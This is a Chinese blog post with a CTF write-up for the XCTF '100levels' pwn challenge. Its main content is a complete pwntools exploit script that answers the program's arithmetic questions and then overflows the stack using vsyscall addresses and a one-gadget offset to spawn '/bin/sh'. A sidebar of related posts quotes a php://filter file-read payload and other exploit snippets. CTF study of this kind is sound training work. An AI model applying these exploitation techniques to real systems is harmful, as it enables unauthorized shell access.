xctf 100levels

最新推荐文章于 2024-05-21 22:36:43 发布
最新推荐文章于 2024-05-21 22:36:43 发布
阅读量240 收藏
点赞数 1
分类专栏: 题目 学习 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/103170880
版权

直接用vsyscall的地址不会发生改变通过栈的结构分布发现返回地址+24byte之后便是system_addr将其改为execve(’/bin/sh’)然后跳到上面即可

from pwn import *
local=1
if local==1:
	p=process('./100levels')
	elf=ELF('./100levels')
	libc=ELF('./libc.so')
else:
	p=remote('111.198.29.45',52480)
	elf=ELF('./100levels')
	libc=ELF('./libc.so')

offset=0x4526a-libc.symbols['system']
vsyscall = 0xffffffffff600000  
def exp():
	p.recvuntil('Choice:\n')
	p.sendline('2')
	p.recvuntil('Choice:\n')
	p.sendline('1')
	p.recvuntil('?')
	p.sendline('0')
	p.sendline(str(offset))
	for i in range(0,99):
		p.recvuntil('Question: ')
		a=int(p.recvuntil('*',drop=True)[-4:])
		b=int(p.recvuntil('=',drop=True)[-4:])
		p.recvuntil('Answer:')
		p.sendline(str(a*b))
	p.recvuntil('Answer:')
	p.send('a'*0x38+p64(vsyscall)*3)
	p.interactive()

if __name__=="__main__":
	exp()
doudoudedi
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2019XCTF攻防世界之萌新入坑
weixin_44113469的博客
04-06 1627
XCTF攻防世界的题质量确实很高,还有解题思路和writeup,真是棒极了。 萌新入坑 0x01 babystack 保护机制 题目开启了nx,canary 题目代码 思路分析 ①这道题主要是绕过canary,然后栈溢出getshell。 ②经分析,read函数读入到s处,可以溢出。 ③put函数输出s的内容,遇到’\x00’才停止,即使字符串中存在’\n’,也会继续输出,用...
hitb-2017 1000levels writeup
jmp esp
08-28 1652
题目分析题目设置的还是比较巧妙的。本身是一个二进制的文件,linux 64环境,保护情况如下: Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled功能一共三个: 1. go:
XCTF 3rd-BCTF-2017——100levels
05-08 379
64位程序,没开canary,但开了PIE  #爆破 #vsyscall 程序逻辑 1 __int64 __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 int v3; // eax 4 5 set(); 6 put_logo(); 7 while ( 1 ) ...
CTF-PWN100levels(vsyscall利用)
SuperGate的博客
10-30 712
程序流程&漏洞分析 checksec: supergate@ubuntu:~/Desktop/Pwn$ checksec pwn [*] '/home/supergate/Desktop/Pwn/pwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found N...
【HITB GSEC CTF 2017】1000levels
weixin_30709929的博客
09-08 171
https://files.cnblogs.com/files/p4nda/498a3f10-8976-4733-8bdb-30d6f9d9fdad.gz #通过阅读天枢战队大佬们的wp调试的结果 首先查看一下该elf文件的保护情况: 是64位程序,有PIE、NX保护,没有canary保护,怀疑是栈溢出类型。 开始寻找溢出点,通过阅读ida得到的代码,大致分析一下文件含义:...
XCTF re1-100
m0_62506844的博客
07-12 148
xctf re
XCTF pwn-100
最新发布
zwb2603096342的博客
05-21 550
XCTF pwn-100 典型的64位ret2libc
xctf re1-100
lhk124的博客
09-06 188
无fuck可说
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
圣徒xctf网站
02-14
圣徒xctf网站概述SaintsXCTF Web应用程序的前端。 这是SaintsXCTF Web应用程序的第二个版本。 前端使用React.js编写,并使用Sass进行样式设置。 API调用通过Nginx代理路由到 。指令在本地启动应用程序首次设置应该...
writeup:xctf撰写
03-28
写上去xctf撰写
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
xctf ics-05 wp
doudoudedi
06-18 2705
今天刚考完数据库就来刷体了很累所以做了很久 诶还是不够仔细啊没有认真的做出来 应该直接想到任意文件读取的诶 page=php://filter/read=convert.base64-encode/resource=index.php 爆出源码: <?php error_reporting(0); @session_start(); posix_setui...
记一道简单的RIP覆盖的pwn(远程的话因为ubuntu18缘故所以栈需要对齐)
doudoudedi
06-03 2632
记一道BUUCTF简单的RIP覆盖的pwn 这个题目就是单纯的RIP覆盖 直接打开64位IDA 直接就有shell可以直接利用 然后就是算偏移了 直接用gdb-peda的工具算出偏移为23 直接上exp: from pwn import * p=remote('buuoj.cn',6001) system=0x401186 payload='a'*23+p64(system) p.sendl...
ciscn_2019_n_4
doudoudedi
02-03 1967
堆块上有悬挂的指针直接对它进行写入即可 exp: #!/usr/bin/python2 from pwn import * #p=process('./ciscn_2019_n_4') p=remote('node3.buuoj.cn',25967) elf=ELF('./ciscn_2019_n_4') libc=elf.libc def add(size,content): p.sen...
bugku pwn2
doudoudedi
06-04 1695
这道题是一道简单的栈溢出 直接用IDA查看 很明显的得到flag的函数 直接上exp from pwn import * p=remote('114.116.54.89',10003) p.recvuntil('something?') payload='a'*56+p64(0x400751) p.sendline(payload) p.interactive() ...
BUUCTF get_started_3dsctf_2016
doudoudedi
10-04 1302
这道题和昨天差不多栈溢出覆盖返回地址然后把bss段mprotect可读可写可执行然后写入shellcode跳入bss段即可 exp: from pwn import * def debug(): gdb.attach(p) #p=process('./getstarted') p=remote('node2.buuoj.cn.wetolink.com',28646) elf=ELF('./ge...
BUUCTF HarekazeCTF2019 babyrop2
doudoudedi
11-01 1243
这道题是用printf泄露已经调用过的函数确定libc文件然后用ROPgetshell(这里有格式化字符串,没有的话可以read一个然后在泄露反正够长) exp: #coding:utf-8 #name:doudou from pwn import * #p=process('./babyrop2') p=remote('node3.buuoj.cn',28818) elf=ELF('./baby...
xctf supersqli
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入漏洞来获取敏感数据或者执行非授权操作。这个题目可以帮助参与者提升对于 SQL 注入漏洞的理解和防御能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值